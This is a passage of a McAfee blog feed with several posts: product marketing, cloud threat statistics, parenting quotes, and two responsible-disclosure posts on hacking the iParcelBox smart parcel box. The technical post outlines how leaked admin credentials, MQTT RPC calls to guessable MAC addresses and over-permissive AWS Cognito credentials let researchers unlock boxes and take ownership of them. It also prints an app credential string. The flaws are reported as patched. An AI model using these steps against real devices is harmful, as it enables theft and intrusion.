  • Enable a remote work force with a direct-to-cloud architecture that delivers 99.999% availability – As countries and states slowly came out of the shelter-in-place orders, many organizations indicated that supporting a remote and distributed workforce will likely be the new norm. Keeping remote workers productive, data secured, and endpoints protected can be overwhelming at times. A next-gen SWG should provide organizations with the scalability and security to support today’s remote workforce and distributed digital ecosystem. A cloud-native architecture helps ensure availability, lower latency, and maintain user productivity from wherever your team is working. A true cloud-grade service should offer five nines (99.999%) availability consistently.

 

  • Reduce administrative complexity and lower cost – Today, with increased cloud adoption, more than eighty percent of traffic is destined for the internet. Backhauling internet traffic to a traditional “Hub and Spoke” architecture which requires expensive MPLS links can be very costly. Network slows to a halt as traffics spikes, and VPN for remote workers have proven to be ineffective. A next-gen SWG should support the SASE framework and provide a direct-to-cloud architecture that lowers the total operating costs by reducing the need for MPLS links. With a SaaS delivery model, next-gen SWG’s remove the need to deploy and maintain hardware infrastructure reducing hardware and operating costs. Per Gartner’s SASE report, organizations can “reduce complexity now on the network security side by moving to ideally one vendor for secure web gateway (SWG), cloud access security broker (CASB)…”  By unifying CASB and SWG, organizations can benefit from unified policy and incident management, shared insights on business risk and threat database, and reduced administrative complexity.

 

  • Defend against known and unknown threats – As the web continues to grow and evolve, web-borne malware attacks grow and evolve as well. Ransomware, Phishing and other advanced web-based threats are putting users and endpoints at risk.  A next-gen SWG should provide real-time Zero-day malware and advanced phishing protection via a layered approach that integrates dynamic threat intelligence for URL, IPs and file-hashes and real-time protection against unknown threats with machine-learning and emulation-based sandboxing. A next-gen SWG should also include integrated Remote Browser Isolation to prevent unknown threats from ever reaching the endpoints. Furthermore, a next-gen SWG should provide the capability to decrypt, inspect and re-encrypt SSL/TLS traffic so threats and sensitive data cannot hide in encrypted traffic. Lastly, a next-gen SWG should be XDR-integrated to improve SOC efficiencies. SOC teams have too much to deal with already and they shouldn’t settle for Siloed security tools.

 

  • Lock down your data, not your business – More than 95% of companies today use cloud services, yet only 36% of companies can enforce data loss prevention (DLP) rules in the cloud at all. A next-gen SWG should offer a more effective way to enforce protection with built-in Data Loss Prevention templates and in-line data protection workflows to help organizations comply with regulations. A device-to-cloud data protection offers comprehensive data visibility and consistent controls across endpoints, users, clouds, and networks. When incidents do happen, administrators should be able to manage investigations, workflows, and reporting from a single console. Next-gen SWGs should also integrate user and entity behavior analytics (UEBA) to further protect business sensitive data by detecting and separating normal users from the malicious or compromised ones.

SWGs have clearly come a long way from just being URL filtering devices to the point where they are essential to furthering the safe and accelerated adoption of the cloud. But we need to push the proverbial envelope a lot further. Digital transformation demands nothing less.

Live Webinar

Top Use Cases for a Next-Gen Secure Web Gateway

Thursday, July 16, 2020
10am PT | 12pm CT | 1pm ET

Register Now

 

The post What to Expect from the Next Generation of Secure Web Gateways appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/enterprise/cloud-security/what-to-expect-from-the-next-generation-of-secure-web-gateways/feed/ 0
Working from Home in 2020: Threat Actors Target the Cloud https://www.mcafee.com/blogs/enterprise/cloud-security/working-from-home-in-2020-threat-actors-target-the-cloud/ https://www.mcafee.com/blogs/enterprise/cloud-security/working-from-home-in-2020-threat-actors-target-the-cloud/#comments Mon, 22 Jun 2020 15:00:19 +0000 /blogs/?p=101994

Like any enterprise, cybercrime focuses its resources where it can derive value, which is data. In the case of ransomware, data is held hostage for a direct monetary exchange, whereas many other data breaches seek to steal data and monetize it on dark web markets. These two methods are even starting to merge, with some cybercrime organizations now offering Data-Leaking-as-a-Service. For most […]

The post Working from Home in 2020: Threat Actors Target the Cloud appeared first on McAfee Blogs.

]]>

Like any enterprise, cybercrime focuses its resources where it can derive value, which is data. In the case of ransomware, data is held hostage for a direct monetary exchange, whereas many other data breaches seek to steal data and monetize it on dark web markets. These two methods are even starting to merge, with some cybercrime organizations now offering Data-Leaking-as-a-Service. For most of the history of cybercrime, resources and infrastructure used to steal data targeted endpoint devices and network stores, using malware to land an attack, find data, and exfiltrate. That’s where the data was.   

Now, we have a dramatic shift of data moving to cloud service providers, held not within the confines of a customer’s managed network but instead a third party. The shift to working from home in early 2020 accelerated cloud use, just as it accelerated other trends like food delivery and telehealth. Read more about the increase in cloud use in our first post on this topic, here.  

With the acceleration of cloud adoption comes more data in the cloud, and in lockstep, threat actors shifting their attack resources to the cloudThrough the first months of 2020 as this shift occurred, we monitored attack attempts from external threat actors on our customer’s cloud accounts, which increased 630%: 

  

In this chart, we’ve plotted all threats across 30 million cloud end users, along with the two primary categories of external threat events targeted at cloud accounts. They are: 

  • Excessive Usage from Anomalous Location. This begins with a login from a location that has not been previously detected and is anomalous to the user’s organization. The threat actor then initiates high-volume data access and/or privileged access activity.  
  • Suspicious Superhuman. This is a login attempt from more than one geographically distant location, impossible to travel to within a given period of time. We track this across multiple cloud services, for example, if a user attempts to log into Microsoft 365 in Singapore, then logs into Slack in California five minutes later.  

The increase in threat events impacted some verticals more than others, with companies in Transportation/Logistics, Education, and Government agencies hit the hardest:  

 

Head over to the report below for more analysis on how specific verticals were targeted, where these attacks came from, and recommendations for how to protect your organization.  

 

The post Working from Home in 2020: Threat Actors Target the Cloud appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/enterprise/cloud-security/working-from-home-in-2020-threat-actors-target-the-cloud/feed/ 2
25 Amazing Quotes To Inspire You This Fathers Day https://www.mcafee.com/blogs/consumer/family-safety/25-amazing-quotes-inspire-recharge-parenting/ https://www.mcafee.com/blogs/consumer/family-safety/25-amazing-quotes-inspire-recharge-parenting/#comments Sat, 20 Jun 2020 13:01:49 +0000 http://blogs.mcafee.com/?p=36204 Today’s blog post is going to take a little detour off the main road. We’re going to pause from gulping down information and slaying cyber dragons and simply refuel our parenting tanks. So often the best wisdom comes from lands far beyond our well-traveled parenting peripheral. The best ideas and most brilliant connections often sneak up on […]

The post 25 Amazing Quotes To Inspire You This Fathers Day appeared first on McAfee Blogs.

]]>
shutterstock_56156032 copy

Today’s blog post is going to take a little detour off the main road. We’re going to pause from gulping down information and slaying cyber dragons and simply refuel our parenting tanks. So often the best wisdom comes from lands far beyond our well-traveled parenting peripheral. The best ideas and most brilliant connections often sneak up on us to challenge our thinking and our parenting norms, which can be a very, very good thing.

So here are some great (and hopefully new) thoughts on parenting to inject some fresh vision and levity into your perspective. If you’re anything like this parent, you much prefer a good cup of coffee, a quiet house, and a double dose of higher thinking over just about any life perk. Oh, and if you need a great laugh, listen to Author Andy Andrews’ 50 Famous Parental Sayings in this video!

25 Amazing Parenting Quotes:

  1. “Hugs can do great amounts of good, especially for children.” – Princess Diana
  2. “Trust yourself. You know more than you think you do.” – Dr. Benjamin Spock
  3. “Even in our increasingly toxic culture, parents can still have the inside track in their children’s development because parents are their children’s first and most important moral teachers.” – Dr. Michele Borba
  4. “The most beautiful sight in the world is a little child going confidently down the road of life after you have shown him the way.” – Confucius
  5. “I’ve learned that you can tell a lot about a person by the way he or she handles these three things: a rainy day, lost luggage, and tangled Christmas tree lights.” – Maya Angelou
  6. “What it’s like to be a parent: It’s one of the hardest things you’ll ever do but in exchange it teaches you the meaning of unconditional love.” -Nicholas Sparks
  7. “To be in your children’s memories tomorrow, you have to be in their lives today.” – Barbara Johnson
  8. “Children have never been very good at listening to their elders, but they have never failed to imitate them.” – James Baldwin
  9. “Don’t let the sun go down without saying thank you to someone, and without admitting to yourself that absolutely no one gets this far alone.” – Stephen King
  10. “Work at our responsibility as parents as if everything in life counted on it.” – Gordon B. Hinckley
  11.  “But let me tell you something, ladies. There will come a day when you look back on these [toddler] years with something that feels like wistfulness. A longing even. Because that pea-soup-spewing, head spinning, chicken-nugget-clutching abomination in the car seat behind you is going to be a teenager some day. And then things get really fun.” – Jennifer Ball, blogger
  12. “Vulnerability sounds like truth and feels like courage. Truth and courage aren’t always comfortable, but they’re never weakness.” – Brene Brown
  13.  “Sometimes we’re so concerned about giving our children what we never had growing up, we neglect to give them what we did have growing up.” – Dr. James Dobson
  14.  “Live life in such a way that when your children think of fairness and integrity, they think of you.” – H. Jackson Brown, Jr.
  15. “If you are a parent, open doors to unknown directions to the child so he can explore. Don’t make him afraid of the unknown, give him support.” – Osho
  16.  “When you’re feeling insecure and just plain not-good-enough as a parent, remember most parents feel the same way.” – Anon.
  17.  “The way we talk to our children becomes their inner voice.” – Peggy O’Mara
  18. “Always kiss your children good night even if they’re already asleep.” – H. Jackson Brown, Jr.
  19. “Never let the things you want make you forget the things you have.” – Anon.
  20. “Children need love the most when they least deserve it.” – Harlod Hulbet
  21. “A father’s words are like a thermostat that sets the temperature in the house.” – Paul Lewis
  22.  “Children spell ‘love’. . . T-I-M-E. – Dr. A. Witham
  23. “The school will teach children how to read, but the environment of the home must teach them what to read. The school can teach them how to think, but the home must teach them what to believe.” – Charles A. Wells
  24.  “Don’t feel entitled to anything you didn’t sweat and struggle for.” – Marian Wright Edelman
  25. “If you want your children to improve, let them overhear the nice things you say about them to others.” – Haim Ginott

ToniTwitterHS

Toni Birdsong is a Family Safety Evangelist to McAfee. You can find her on Twitter @SafeEyes

The post 25 Amazing Quotes To Inspire You This Fathers Day appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/consumer/family-safety/25-amazing-quotes-inspire-recharge-parenting/feed/ 1
ST20: Quantum Computing with Steve Grobman & Jon King https://www.mcafee.com/blogs/other-blogs/podcast/st20-quantum-computing-with-steve-grobman-jon-king/ https://www.mcafee.com/blogs/other-blogs/podcast/st20-quantum-computing-with-steve-grobman-jon-king/#respond Thu, 18 Jun 2020 17:41:05 +0000 /blogs/?p=101991

McAfee’s Chief Technology Officer Steve Grobman and Fellow Jon King discuss quantum computing and potential impacts to security as this technology continues to develop.

The post ST20: Quantum Computing with Steve Grobman & Jon King appeared first on McAfee Blogs.

]]>

McAfee’s Chief Technology Officer Steve Grobman and Fellow Jon King discuss quantum computing and potential impacts to security as this technology continues to develop.

The post ST20: Quantum Computing with Steve Grobman & Jon King appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/other-blogs/podcast/st20-quantum-computing-with-steve-grobman-jon-king/feed/ 0
My Adventures Hacking the iParcelBox https://www.mcafee.com/blogs/other-blogs/mcafee-labs/my-adventures-hacking-the-iparcelbox/ https://www.mcafee.com/blogs/other-blogs/mcafee-labs/my-adventures-hacking-the-iparcelbox/#respond Thu, 18 Jun 2020 07:01:48 +0000 /blogs/?p=101923

In 2019, McAfee Advanced Threat Research (ATR) disclosed a vulnerability in a product called BoxLock. Sometime after this, the CEO of iParcelBox, a U.K. company, reached out to us and offered to send a few of their products to test. While this isn’t the typical M.O. for our research we applaud the company for being […]

The post My Adventures Hacking the iParcelBox appeared first on McAfee Blogs.

]]>

In 2019, McAfee Advanced Threat Research (ATR) disclosed a vulnerability in a product called BoxLock. Sometime after this, the CEO of iParcelBox, a U.K. company, reached out to us and offered to send a few of their products to test. While this isn’t the typical M.O. for our research we applaud the company for being proactive in their security efforts and so, as the team over at iParcelBox were kind enough to get everything shipped over to us, we decided to take a look.

The iParcelBox is a large steel box that package couriers, neighbors, etc. can access to retrieve or deliver items securely without needing to enter your home. The iParcelBox has a single button on it that when pushed will notify the owner that someone wants to place an object inside. The owner will get an “open” request push notification on their mobile device, which they can either accept or deny.

The iParcelBox (Photo Credit: iparcelbox.com)

Recon

The first thing we noticed about this device is the simplicity of it. In the mindset of an attacker, we are always looking at a wide variety of attack vectors. This device only has three external vectors: remote cloud APIs, WIFI, and a single physical button.

iParcelBox Delivery Button (Photo Credit: iparcelbox.com)

During setup the iParcelBox creates a WIFI access point for the mobile application to connect with and send setup information. Each iParcelBox has a unique randomly generated 16-character WiFi password that makes brute forcing the WPA2 key out of the question; additionally, this Access Point is only available when the iParcelBox is in setup mode. The iParcelBox can be placed into setup mode by holding the button down but it will warn the owner via a notification and will only remain in setup mode for a few minutes before returning to normal operation.

iParcelBox Random WiFi Access Point Password (16 Characters)

Since we have the WiFi password for the iParcelBox in our lab, we connected to the device to see what we could glean from the webserver. The device was only listening on port 443, meaning that the traffic between the application and iParcelBox was most likely encrypted, which we later verified. This pointed us to the Android app to try to decipher what type of messages were being sent to the iParcelBox during setup.

iParcelBox Port Scan

Using dex2jar we were able to disassemble the APK file and look at the code within the app. We noticed quickly that the iParcelBox was using MQTT (MQ Telemetry Transport) for passing messages back and forth between the iParcelBox and the cloud. MQTT is a publish/subscribe message protocol where devices can subscribe to “topics” and receive messages. A simple description can be found here: (https://youtu.be/EIxdz-2rhLs)

Dex2Jar Command

A typical next step is to retrieve the firmware for the device, so we started to look through the disassembled APK code for interesting URLs. While we didn’t find any direct firmware links, we were able to find some useful information.

Disassembled Code pulled from APK

The code snipped above shows a few interesting points, including the string “config.iparcelbox.com” as well as the line with “app” and “TBpwkjoU68M”. We thought that this could be credentials for an app user passed to the iParcelBox during setup; however, we’ll come back to this later. The URL didn’t resolve on the internet, but when connecting to the iParcelBox access point and doing a Dig query we were able to see that it resolves to the iParcelBox.

DNS Lookup of config.iparcelbox.com

Nothing from the Android app or the webserver on the device popped out to us so we decided to look deeper. One of the most common ways that information about targets can be gathered is by looking through user forums and seeing if there are others trying to tweak and modify the device. Often with IOT devices, home automation forums have numerous examples of API usage as well as user scripts to interact with such devices. We wanted to see if there was anything like this for the iParcelBox. Our initial search for iParcelBox came up empty, other than some marketing content, but when the search was changed to iParcelBox API, we noticed a few interesting posts.

Google Search for “iparcelbox api”

We could see that even on the first page there are a few bug reports and a couple of user forums for “Mongoose-OS”. After going to the Mongoose-OS forums we could clearly see that one user was a part of the iParcelBox development team. This gave us some insight that the device was running Mongoose-OS on an ESP32 Development board, which is important since an ESP32 device can be flashed with many other types of code. We started to track the user’s posts and were able to discover extensive information about the device and the development decisions throughout the building process. Most importantly this served as a shortcut to many of the remaining analysis techniques.

As mentioned earlier, a high priority is to try to gain access to the device’s firmware by either pulling it from the device directly or by downloading it from the vendor’s site. Pulling firmware is slightly more tedious since you must often solder wires to the flash chip or remove the chip all-together to interface with the flash. Before we began to attempt to pull the firmware from the ESP32, we noticed another post within the forums that mentioned that the flash memory on the device was encrypted.

Post describing flash encryption

With this knowledge, we skipped soldering wires to the ESP32 and didn’t even try to pull the firmware manually since it would have proven difficult to get anything off it. This also gave us insight into the provisioning process and how each device is set up. With this knowledge we started to look for how the OTA updates are downloaded.

Searching around a little longer we were able to find a file upload of a large log file containing what seemed like the iParcelBox boot procedure. Searching through the log we found some highly sensitive data.

Admin Credentials and gh-token from boot log

In the snippet above you can see that the admin credentials are passed as well as the GitHub token. Needless to say, this isn’t good practice, we will see if we can use that later. But in this log, we also found a firmware URL.

Firmware URL from boot log

However, the URL required a username and password.

Firmware.iparcelbox.com .htaccess

We found this forum post where “.htaccess” is set up to prevent unintended access to the firmware download.

.htaccess post

The admin password found earlier didn’t authenticate, so we wanted to get the logs off the device to see if these were old credentials and if we could print the new credentials out to UART.

The internals of the iParcelBox (TX and RX highlighted in red)

The ESP32 RX and TX pins are mapped to the USB-C connection, but if you look at the circuit there is no FTDI (Future Technology Devices International) chip to do processing, so this is just raw serial. We decided to just solder to the vias (Vertical Interconnect Access) highlighted in red above, but still no data was transferred.

Then we started to search those overly helpful forum postings again, and quickly found the reason.

Disable UART

This at least verified that it wasn’t something that we set up incorrectly, but rather that logging was simply disabled over UART.

Method #1 – RPC

From our recon work we pretty much settled on the fact that we were not going to get into the iParcelBox easily from a physical standpoint and decided to switch a network approach. We knew that during setup the iParcelBox creates a wireless AP and that we can connect to it. Armed with our knowledge from the forums we decided to revisit the web server on the iParcelBox. We began by sending some “MOS” (Mongoose-OS) control commands to see what stuck.

Setup instructions for Mongoose-OS can be found here. Instead of installing directly to the OS we did it in Docker for portability.

Docker file used to create mos

Referencing the forums provided several examples of how to use the mos command.

Docker mos commands

The first command returned a promising message that we just need to supply credentials. Remember when we found the boot log earlier? Yep, the admin credentials were posted online, and they actually work!

At this point we had full effective root access to the iParcelBox including access to all the files, JavaScript code, and even more importantly, the AWS certificate and private key.

With the files extracted from the device we noticed that the developers at iParcelBox implemented an Access Control List (ACL). For an IOT device this is uncommon but a good practice.

ACL showing users permissions

The credentials we found earlier in the disassembled Android APK with the username “app” were RPC credentials but with limited permissions to only run Sys.GetInfo, Wifi.Scan, Wifi.PortalSave and Sys.Reboot. Nothing too interesting can be done with those credentials, so for the rest of this method we will stick with the “admin” credentials.

Now that we have the credentials, certificates, and private keys we wanted to try to pivot to other devices. During setup we noticed that the MAC address was labeled “TopicID.”

Setup process linking MAC Address to the TopicID

As we determined earlier, the iParcelBox uses MQTT for brokering the communication between the device, cloud, and mobile application. We were interested to find out if there were any authentication barriers in place, or if all you need is the MAC address of the device to initiate commands remotely.

Since we essentially had root access, enabling logging was a logical next step so we could see what was happening on the device. From one of the Mongoose-OS forums posts we saw that you can enable UDP logging to a local device by changing the configuration on the iParcelBox.

How to enable UDP logging post

We provisioned the iParcelBox, then held the button down until we entered setup mode (where the AP was available), thus reenabling RPC calls. Then we set the “udp_log_addr” to our local machine.

Reenabling Logging on iParcelBox

Now we have logs and much more information. We wanted to test if we could access the MQTT broker and modify other iParcelBoxes. In the logs we were able to validate that the MQTT broker was setup on AWS IOT and was using the certificate and keys that we pulled earlier. We found some Python examples of connecting to the AWS MQTT broker (https://github.com/aws/aws-iot-device-sdk-python) but it assumed it knows the full topic path (e.g. topic_id/command/unlock).

UDP Log file

Parsing through the extracted logs from UDP, we were able to find the format for the “shadow/update” MQTT topic. However, when trying to subscribe to it with the Python script, it seemed to connect to the MQTT broker, but we couldn’t ever get any messages to send or receive. Our best guess is that it was limited to one subscribe per topic or that our code was broken.

We went searching for another way to control devices. This brought us back to the Mongoose-OS forum (seeing a pattern here?). We found this post explaining that the devices can run RPC commands over MQTT.

RPC over MQTT

This would be better for an attacker than only MQTT access, since this gives full access to the device including certificates, keys, user configuration files, WIFI passwords, and more. We could also use RPC to write custom code or custom firmware at this point.  We found the official Mongoose-OS support for this here (https://github.com/mongoose-os-libs/rpc-mqtt), to which they even included an example with AWS IOT.

After plugging that into the “mos” command we were able to run all administrative RPC commands on the device that we pulled the keys from, but also any other device that we knew the MAC address of.

Running RPC commands on multiple ATR lab devices

From looking at the two iParcelBoxes that were sent to us, the MAC addresses are only slightly different and strongly suggest that they are probably generated incrementally.

  • 30AEA4C59D30
  • 30AEA4C59D6C

Theoretically, with the MAC addresses incremental we could have just written a simple script to iterate through each of the iParcelBoxes’ MAC addresses, found any iParcelBox connected to the internet, and controlled or modified them in any way we wanted. However, the most common attack would likely be a more targeted one, where the attacker was looking to steal a package or even a victim’s home WiFi credentials. An attacker could do a simple network scan to find the MAC address of the target iParcelbox using a tool like “airodump-ng”. Then, after the attacker knows the target MAC address, they could use the admin credentials to initiate a “mos” command over MQTT and execute a “GPIO.Toggle” command directed at the GPIO (General Purpose Input Output) pin that controls the locking mechanism on the iParcelBox. A toggle will invert the state, so if the iParcelBox is locked, a GPIO toggle will unlock the box. If the attacker had other motives, they could also initiate a config dump to gain access to the WiFi credentials to which the iParcelBox is connected.

Scanning for iParcelBoxes and Controlling them with RPC

Method #2 – AWS Misconfiguration

While writing this blog we wanted to double check that SSL pinning was done properly. After we saw this post during our recon, we assumed it was pinning a certificate. We set up an Android with a certificate unpinner using Frida.  With the unpinner installed and working we were able to decrypt traffic between the application and the AWS servers, but it failed to decrypt the data from application to the iParcelBox. Please follow this technique if you’d like to learn how you can unpin certificates on Android devices.

Next, we reran the iParcelBox application without the Frida SSL Unpinner, which returned the same AWS server transactions, meaning that pinning wasn’t enabled. We browsed through some of the captures and found some interesting requests.

Cognito Credential SSL Network Capture

The “credentials” in the capture immediately piqued our interest. They are returned by a service called “Cognito”, which is an AWS service allowing apps and users to access resources within the AWS ecosystem for short periods of time and with limited access to private resources.

AWS Cognito example (Photo Credit: Amazon.com)

When an application wants to access an AWS service, it can ask for temporary credentials for the specific task. If the permissions are configured correctly, the credentials issued by the Cognito service will allow the application or user to complete that one task and deny all other uses of the credentials to other services.

To use these credentials, we needed the AWS-CLI interface. Thankfully, Amazon even has a Docker image for AWS-CLI which made things much easier for us. We just saved the credentials returned from the Cognito service inside of a “~/.aws” folder. Then we checked what role these credentials were given.

AWS-CLI docker command

The credentials captured from the Android application were given the “AppAuth_Role”. To find out what the “AppAuth_Role” had access to we then ran a cloud service enumeration using the credentials; the scripts can be found here (https://github.com/NotSoSecure/cloud-service-enum) and are provided by the NotSoSecure team. The AWS script didn’t find any significant security holes and showed that the credentials were properly secured. However, looking at the next few network captures we noticed that these credentials were being used to access the DynamoDB database.

Checking if the user is subscribed to the Premium service

Getting the owner’s devices

After reading through some of the DynamoDB documentation we were able to craft database queries.

DynamoDB Query

Because the “primary key” for the database is the “DeviceID” which we know is just the MAC address of the iParcelBox, we can then modify this query and get any other device’s database entries. While we didn’t test this for ethical reasons, we suspect that we could have used this information to gain access to the MQTT services. We also did not attempt to write to the database since this was a live production database and we didn’t want to corrupt any data.

We investigated the Android application attempting to trigger some more database interactions to see what other queries were being sent, but were limited to the following:

  • Accounts – Shows premium subscription info
  • Owners – Shows devices and guests of each iParcelBox
  • Users – Used to save owners of each iParcelBox (only during setup)

With our self-imposed database write restrictions, none of these tables really helped us anyway. That is when we began looking at the disassembled code of the Android app for more clues. Since we now knew the table names, we searched for “ClientID”, which turned up the Java file “DBConstants.class.”

Constants file from APK

This constants file gave us information that there are more database tables and fields, even though we never saw them in the network traffic. The “TABLE_DEVICES_PASSWORD” caught our eyes from the “iParcelBox_devices” table.

We tested the “AppAuth_Role” credentials on this table as well, which was accepted.

Requesting information from the iParcelBox_devices table

We were able to get the device password and serial number all from the MAC address. Recall the “iParcelBox Setup Information” image at the beginning of the blog and how it mentions that you should keep this information safe. The reason that this information should be kept safe is that you can become the owner of the iParcelBox if you know the MAC address, serial number, and password even without the QR code thanks to the “Add Manually” button.

“Add manually” option during setup

With this information an attacker could register for a new iParcelBox account, login to the application, capture the Cognito credentials, begin the “setup” process, click “Add Manually” and then enter all the required information returned from the database to gain full control over any iParcelBox. This could all take place from simply knowing the MAC address since the “AppAuth_Role” can read any database entry.

Required Information to set up the iParcelBox

Lessons Learned

This project took a turn from a classic hardware/IOT device research project to an OSINT research topic very early on. It really goes to show that even simple mistakes with online data hygiene could expose key details to attackers allowing them to narrow down attack vectors or expose sensitive information like credentials.

Since this was a sponsored project from iParcelBox, we reported this to the company immediately. They promptly changed the admin password for every iParcelBox and asked the developers at Mongoose-OS to implement a change where one device’s AWS certificate and private key cannot control any other device. This was patched within 12 hours after our vendor disclosure, which puts iParcelBox in the top response time for a patch that we have ever seen. We have tested the patch and can no longer control other devices or use the old admin password to access the devices from within setup mode.

iParcelBox also fixed the Android application not pinning certificates properly and removed all direct calls to the DynamoDB. We were still able to decrypt some traffic using the Frida SSL unpinner, but the application would freeze, which we believe is due to the MQTT broker not accepting a custom certificate. The DynamoDB queries are now wrapped in API calls which also check against the customer ID. This prevents someone from using their extracted Cognito credentials to obtain information from any device other than their own. Wrapping the database queries within API calls is an effective security fix as well, as the data can be parsed, verified, and sanitized all before committing to the database.

We wanted to give props to the team at iParcelBox for their focus on security throughout the development of this product. It is easy to see from the device and the forum posts that the developers have been trying to make this device secure from the start and have done it well. All non-essential features like UART and Bluetooth are turned off by default and a focus on data protection is clearly there as evidenced through the use of SSL and encryption of the flash memory. There are not many attack surfaces that an attacker could leverage from the device and is a great refreshment to see IOT devices heading this direction.

The post My Adventures Hacking the iParcelBox appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/my-adventures-hacking-the-iparcelbox/feed/ 0
What’s in the Box? Part II: Hacking the iParcelBox https://www.mcafee.com/blogs/other-blogs/mcafee-labs/whats-in-the-box-part-ii-hacking-the-iparcelbox/ https://www.mcafee.com/blogs/other-blogs/mcafee-labs/whats-in-the-box-part-ii-hacking-the-iparcelbox/#respond Thu, 18 Jun 2020 07:01:40 +0000 /blogs/?p=101920

Package delivery is just one of those things we take for granted these days. This is especially true in the age of Coronavirus, where e-commerce and at-home deliveries make up a growing portion of consumer buying habits. In 2019, McAfee Advanced Threat Research (ATR) conducted a vulnerability research project on a secure home package delivery […]

The post What’s in the Box? Part II: Hacking the iParcelBox appeared first on McAfee Blogs.

]]>

Package delivery is just one of those things we take for granted these days. This is especially true in the age of Coronavirus, where e-commerce and at-home deliveries make up a growing portion of consumer buying habits.

In 2019, McAfee Advanced Threat Research (ATR) conducted a vulnerability research project on a secure home package delivery product, known as BoxLock. The corresponding blog can be found here and highlights a vulnerability we found in the Bluetooth Low Energy (BLE) configuration used by the device. Ultimately, the flaw allowed us to unlock any BoxLock in Bluetooth range with a standard app from the Apple or Google store.

Shortly after we released this blog, a similar product company based in the UK reached out to the primary researcher (Sam Quinn) here at McAfee ATR, requesting that the team perform research analysis on his product, called the iParcelBox. This device is comprised of a secure steel container with a push-button on the outside, allowing for package couriers to request access to the delivery container with a simple button press, notifying the homeowner via the app and allowing remote open/close functions.

iParcelBox – Secure Package Delivery & iParcelBox App

The researcher was able to take a unique spin on this project by performing OSINT (Open Source Intelligence), which is the practice of using publicly available information, often unintentionally publicized, to compromise a device, system or user. In this case, the primary developer for the product wasn’t practicing secure data hygiene for his online posts, which allowed the researcher to discover information that dramatically shortened what would have been a much more complicated project. He discovered administrative credentials and corresponding internal design and configurations, effectively providing the team access to any and all iParcelBox devices worldwide, including the ability to unlock any device at a whim. All test cases were executed on lab devices owned by the team or approved by iParcelBox. Further details of the entire research process can be found in the full technical version of the research blog here.

The actual internals of the system were well-designed from a security perspective, utilizing concepts like SSL for encryption, disabling hardware debugging, and performing proper authentication checks. Unfortunately, this level of design and security were all undermined by the simple fact that credentials were not properly protected online. Armed with these credentials the researcher was able to extract sensitive certificates, keys, device passwords, and WIFI passwords off any iParcelBox.

Secondly, as the researcher prepared the writeup on the OSINT techniques used for this, he made a further discovery. When analyzing the configuration used by the Android app to interact with the cloud-based IOT framework (AWS-IOT), he found that even without an administrative password, he could leak plaintext temporary credentials to query the AWS database. These credentials had a permission misconfiguration which allowed the researcher to query all the information about any iParcelBox device and to become the primary owner.

In both cases, to target a device, an attacker would need to know the MAC address of the victim’s iParcelBox; however, the iParcelBox MAC addresses appeared to be generated non-randomly and were simple to guess.

A typical research effort for McAfee ATR involves complex hardware analysis, reverse engineering, exploit development and much more. While the developer made some high-level mistakes regarding configuration and data hygiene, we want to take a moment to recognize the level of effort put into both physical and digital security. iParcelBox implemented numerous security concepts that are uncommon for IOT devices and significantly raise the bar for attackers. It’s much easier to fix issues like leaked passwords or basic configuration issues than to rebuild hardware or reprogram software to bolt on security after the fact. This may be why the company was able to fix both issues almost immediately after we informed them in March of 2020. We’re thrilled to see more and more companies of all sizes embracing the security research community and collaborating quickly to improve their products, even from the beginning of the development cycle.

What can be done?

For consumers:

Even developers are subject to the same issues we all have; choosing secure and complex passwords, protecting important credentials, practicing security hygiene, and choosing secure configurations when implementing controls for a device. As always, we encourage you to evaluate the vendor’s approach to security. Do they embrace and encourage vulnerability research on their products? How quick are they to implement fixes and are they done correctly? Nearly every product on the market will have security flaws if you look hard enough, but the way they are handled is arguably more important than the flaws themselves.

For developers and vendors:

This case study should provide a valuable testament to the power of community. Don’t be afraid to engage security researchers and embrace the discovery of vulnerabilities. The more critical the finding, the better! Work with researchers or research companies that practice responsible disclosure, such as McAfee ATR. Additionally, it can be easy to overlook the simple things such as the unintentional leak of critical data found during this project. A security checklist should include both complex and simple steps to ensure the product maintains proper security controls and essential data is protected and periodically audited.

The post What’s in the Box? Part II: Hacking the iParcelBox appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/whats-in-the-box-part-ii-hacking-the-iparcelbox/feed/ 0
Internet Privacy: Tips & Tricks for Staying Secure Online https://www.mcafee.com/blogs/consumer/internet-privacy-tips-tricks-for-staying-secure-online/ https://www.mcafee.com/blogs/consumer/internet-privacy-tips-tricks-for-staying-secure-online/#comments Tue, 16 Jun 2020 16:48:55 +0000 /blogs/?p=101977 Working from home

How much value do you place on your personal privacy? You would never leave your wallet on a public park bench and expect it to be safe and untouched. It is possible that no one would take your valuable belongings, but you’d never intentionally take the risk – so why would you risk your personal […]

The post Internet Privacy: Tips & Tricks for Staying Secure Online appeared first on McAfee Blogs.

]]>
Working from home

How much value do you place on your personal privacy? You would never leave your wallet on a public park bench and expect it to be safe and untouched. It is possible that no one would take your valuable belongings, but you’d never intentionally take the risk – so why would you risk your personal data online?

The Power of Privacy

No matter who you are, you need to protect what’s yours. The fact is that your online data can’t be replaced the same way that your tangible possessions can be, and privacy has an intrinsic value that can be easily compromised on the web.

So how can you keep yourself and your sensitive information safe online? To learn more about safety while browsing the web, read on.

What is a Virtual Private Network?

A VPN, or virtual private network, routes your internet usage exclusively through private channels. Doing this effectively blocks your web activity from prying eyes and subsequently protects your sensitive data. When using public Wi-Fi hotspots, a VPN hides your identity and location, preserving your privacy and offering you peace of mind.

What Can A VPN Do For You?

In this fast-paced, high-tech world, a VPN is an invaluable asset. While your internet service provider (ISP) can’t read your online interactions, it’s nevertheless capable of identifying communication links. For example, it can trace the connections from your computer to sensitive web addresses like your bank or brokerage firm. Knowing that your vulnerable information is floating around on the internet might be enough to entice an unscrupulous ISP into finding and using it for their own benefit.

If you’re not using public internet services or doing your computing from home, you might be wondering if you need a VPN at all. Not necessarily, but at McAfee, we believe it always pays to take precautions.

Are Your Passwords Protecting You?

We often feel secure relying on passwords to protect our privacy. The unfortunate truth is that a password alone may not be enough to deter a hacker. If you notice unusual behavior on your computer, it could mean that a hacker already knows your password.

We need passwords to get almost anywhere on the internet, but the familiarity of this practice may result in complacency. After a while, a password may seem unimportant or even burdensome. Instead of trying to remember countless complicated passwords, you might feel overly comfortable in resorting to simpler passwords that are easily breakable with even the smallest effort.

